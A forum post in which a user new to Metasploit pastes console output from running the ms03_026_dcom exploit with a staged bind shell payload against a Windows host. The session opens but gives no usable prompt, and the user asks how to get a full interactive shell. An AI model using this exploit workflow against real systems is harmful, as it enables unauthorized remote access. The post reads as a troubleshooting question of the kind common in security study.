aburrid0 Posted July 21, 2020 Share Posted July 21, 2020 I'm pretty new to Metasploit but I have what appears to be a successful shell/session created however there is no prompt (normal commands return nothing) and I see that it shows only the default route (0.0.0.0:0) between my computer and the target. I did input my LHOST though it is a staged bind shell payload (inline payload shells produce the same result and meterpreter payloads don't work). Is it possible to obtain a full interactive shell? ======================================================================================================================================= msf5 exploit(windows/dcerpc/ms03_026_dcom) > run [*] 10.XX.XX.XX:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal... [*] 10.XX.XX.XX:135 - Binding to ZZ@ff_ip_tcp:10.XX.XX.XX[135] ... [*] 10.XX.XX.XX:135 - Bound to ZZ@ff_ip_tcp:10.XX.XX.XX[135] ... [*] 10.XX.XX.XX:135 - Sending exploit ... [*] Started bind TCP handler against 10.XX.XX.XX:135 [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 10.XX.XX.XX [*] Command shell session 1 opened (0.0.0.0:0 -> 10.XX.XX.XX:135) at 2020-07-21 14:50:17 -0600 background Background session 1? [y/N] y msf5 exploit(windows/dcerpc/ms03_026_dcom) > sessions -i Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell x86/windows 0.0.0.0:0 -> 10.XX.XX.XX:135 (10.XX.XX.XX) msf5 exploit(windows/dcerpc/ms03_026_dcom) > Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.